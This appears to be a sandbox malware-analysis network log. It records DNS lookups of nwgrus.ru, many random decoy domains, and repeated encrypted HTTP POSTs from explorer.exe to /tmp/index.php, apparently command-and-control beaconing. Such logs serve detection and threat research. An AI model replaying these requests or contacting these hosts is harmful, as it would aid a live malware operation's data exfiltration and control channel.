                                                                            Oct 14, 2024 01:55:03.115145922 CEST805004458.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:08.434984922 CEST5004580192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:08.440068007 CEST805004558.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:08.440363884 CEST5004580192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:08.440407991 CEST5004580192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:08.440407991 CEST5004580192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:08.445372105 CEST805004558.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:08.445383072 CEST805004558.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:09.949276924 CEST805004558.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:09.949969053 CEST805004558.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:09.950050116 CEST5004580192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:09.950143099 CEST5004580192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:09.955471992 CEST805004558.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:15.610415936 CEST5004680192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:15.615705013 CEST805004658.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:15.615817070 CEST5004680192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:15.616013050 CEST5004680192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:15.616063118 CEST5004680192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:15.621125937 CEST805004658.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:15.621169090 CEST805004658.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:17.943950891 CEST805004658.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:17.944026947 CEST805004658.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:17.944119930 CEST5004680192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:17.945818901 CEST5004680192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:17.950668097 CEST805004658.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:22.605346918 CEST5004780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:22.610667944 CEST805004758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:22.610780001 CEST5004780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:22.610935926 CEST5004780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:22.610937119 CEST5004780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:22.616003990 CEST805004758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:22.616033077 CEST805004758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:24.219738007 CEST805004758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:24.265830994 CEST805004758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:24.265966892 CEST5004780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:24.266062975 CEST5004780192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:24.271219969 CEST805004758.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:28.579772949 CEST5004880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:28.585165024 CEST805004858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:28.585268974 CEST5004880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:28.585405111 CEST5004880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:28.585429907 CEST5004880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:28.591015100 CEST805004858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:28.591054916 CEST805004858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:30.260673046 CEST805004858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:30.261689901 CEST805004858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:30.261755943 CEST5004880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:30.261805058 CEST5004880192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:30.266617060 CEST805004858.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:35.112736940 CEST5004980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:35.118083000 CEST805004958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:35.118192911 CEST5004980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:35.118352890 CEST5004980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:35.118386984 CEST5004980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:35.123316050 CEST805004958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:35.123713970 CEST805004958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:37.592566013 CEST805004958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:37.612277985 CEST805004958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:37.612386942 CEST5004980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:37.612437963 CEST5004980192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:37.617403030 CEST805004958.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:42.377270937 CEST5005080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:42.383109093 CEST805005058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:42.383168936 CEST5005080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:42.383274078 CEST5005080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:42.383285999 CEST5005080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:42.389940023 CEST805005058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:42.389952898 CEST805005058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:44.025274038 CEST805005058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:44.029972076 CEST805005058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:44.030056953 CEST5005080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:44.030113935 CEST5005080192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:44.036514044 CEST805005058.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:48.551573038 CEST5005180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:48.556894064 CEST805005158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:48.557096958 CEST5005180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:48.557193041 CEST5005180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:48.557193041 CEST5005180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:48.562792063 CEST805005158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:48.562820911 CEST805005158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:51.157521009 CEST805005158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:51.157830954 CEST805005158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:51.158024073 CEST5005180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:51.160254002 CEST5005180192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:51.165204048 CEST805005158.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:55.317894936 CEST5005280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:55.323106050 CEST805005258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:55.323280096 CEST5005280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:55.323379040 CEST5005280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:55.323379040 CEST5005280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:55.328490019 CEST805005258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:55.328653097 CEST805005258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:56.957978010 CEST805005258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:56.961333036 CEST805005258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:55:56.961549997 CEST5005280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:56.961550951 CEST5005280192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:55:56.966809034 CEST805005258.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:56:01.906378984 CEST5005380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:56:01.911695004 CEST805005358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:56:01.911793947 CEST5005380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:56:01.911906958 CEST5005380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:56:01.911933899 CEST5005380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:56:01.917319059 CEST805005358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:56:01.917346954 CEST805005358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:56:03.562711000 CEST805005358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:56:03.563688040 CEST805005358.151.148.90192.168.2.4
                                                                            Oct 14, 2024 01:56:03.563735008 CEST5005380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:56:03.563791990 CEST5005380192.168.2.458.151.148.90
                                                                            Oct 14, 2024 01:56:03.568773985 CEST805005358.151.148.90192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 14, 2024 01:52:26.241811037 CEST5355453192.168.2.41.1.1.1
                                                                            Oct 14, 2024 01:52:26.249304056 CEST53535541.1.1.1192.168.2.4
                                                                            Oct 14, 2024 01:54:14.237809896 CEST6394053192.168.2.41.1.1.1
                                                                            Oct 14, 2024 01:54:15.225946903 CEST6394053192.168.2.41.1.1.1
                                                                            Oct 14, 2024 01:54:15.434916019 CEST53639401.1.1.1192.168.2.4
                                                                            Oct 14, 2024 01:54:15.434993982 CEST53639401.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 14, 2024 01:52:26.241811037 CEST192.168.2.41.1.1.10x3d83Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:14.237809896 CEST192.168.2.41.1.1.10x1a3bStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.225946903 CEST192.168.2.41.1.1.10x1a3bStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru181.123.219.23A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru187.209.194.244A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru189.163.31.73A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru189.61.54.32A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:52:26.249304056 CEST1.1.1.1192.168.2.40x3d83No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434916019 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru190.13.174.94A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru123.212.43.225A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru189.181.56.137A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru109.175.29.39A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                            Oct 14, 2024 01:54:15.434993982 CEST1.1.1.1192.168.2.40x1a3bNo error (0)nwgrus.ru46.100.50.5A (IP address)IN (0x0001)false
                                                                            • dylagwrgixlfmu.com
                                                                              • nwgrus.ru
                                                                            • ibgfkpdryxjpgnqh.com
                                                                            • eantthlyjjcdj.org
                                                                            • shpbhnktrtag.net
                                                                            • wcfffybtpterbqpa.net
                                                                            • xnobteannnesvysc.com
                                                                            • tapxxmacigntnnfe.com
                                                                            • vammwtwbjec.org
                                                                            • akhsodkspgrml.net
                                                                            • tsjfluqkxyqldltv.com
                                                                            • xiohrwbimqciogt.org
                                                                            • omlvjsbjwgbtt.com
                                                                            • vsbjnemdwavwq.net
                                                                            • lothfyrshwumy.net
                                                                            • minslgtmvtn.com
                                                                            • ccnaltwqqqsxov.net
                                                                            • stlewbfilnqojsrv.com
                                                                            • egmeddtwjwiedt.com
                                                                            • gklgbytfsyxm.org
                                                                            • aovitjibeagnbys.net
                                                                            • snussmiqvhuxlm.org
                                                                            • lldjdgortos.org
                                                                            • syoedasuherii.org
                                                                            • njefqjlwqiadunh.org
                                                                            • tdojljspnss.net
                                                                            • eodrfdbgkbdgmox.com
                                                                            • cguufeaxdioixvo.net
                                                                            • hbtkpieyfdv.com
                                                                            • nannolqtxvdvgf.org
                                                                            • pjnfdjwducxdwna.com
                                                                            • bvawnwiwcpmgflx.org
                                                                            • yocwufliskskpcvu.com
                                                                            • bfjqfyqpqtyfp.com
                                                                            • xknbcflanypqj.net
                                                                            • fgbayjdhmimo.net
                                                                            • ecwlvrprlkc.net
                                                                            • pfvfrxtosmhgis.com
                                                                            • qrcepyiavbj.net
                                                                            • jbughtdilxsi.org
                                                                            • adulmxafuqyrwioa.org
                                                                            • ibqsdsbooxlotmkk.com
                                                                            • firvhcleclspvqf.net
                                                                            • wastiylaaiv.org
                                                                            • gmunjwtmmqbkfjxj.com
                                                                            • ekdlxdwusihebwve.org
                                                                            • ytxsvmhxdoiv.net
                                                                            • cjgfbmyhhfmho.com
                                                                            • ewwaevdbcqu.com
                                                                            • paccyqypahp.org
                                                                            • vobnbocmacccbp.net
                                                                            • crbgbhwlxoevenop.net
                                                                            • ghpsevkbljqmyuby.org
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449736189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:26.256912947 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://dylagwrgixlfmu.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 114
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:26.256913900 CEST114OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 50 a3 fc
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA .[k,vuwPI)RvN~eX{fdt
                                                                            Oct 14, 2024 01:52:27.352427959 CEST152INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:27 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 04 00 00 00 72 e8 87 e8
                                                                            Data Ascii: r


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449737189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:27.365040064 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://ibgfkpdryxjpgnqh.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 273
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:27.365065098 CEST273OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 70 32 a7 eb
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vup2l>pjdc"u(<~$rrwrB*)5&6Of8\!+v`[;^T{uU,>SdP9Fz{<ve{l>#6'
                                                                            Oct 14, 2024 01:52:28.476666927 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:28 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449738189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:28.485728979 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://eantthlyjjcdj.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 133
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:28.485752106 CEST133OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5b 5e c9 a6
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu[^:yI{M^Qh*I^}gaSB
                                                                            Oct 14, 2024 01:52:29.577939987 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:29 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449739189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:29.586394072 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://shpbhnktrtag.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 304
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:29.586394072 CEST304OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 58 46 ef e4
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuXFd_FmpWt0mdPW$cW$$R,.129{lc u2eNVI0Po_=GV2hME>+4dH8_p
                                                                            Oct 14, 2024 01:52:30.712194920 CEST137INHTTP/1.1 200 OK
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:30 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449740189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:30.745536089 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://wcfffybtpterbqpa.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 159
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:30.746463060 CEST159OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 66 2e e7 e0
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuf.}}@i"paTzy5C4+}$X:-O-%^:zx
                                                                            Oct 14, 2024 01:52:31.838764906 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:31 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
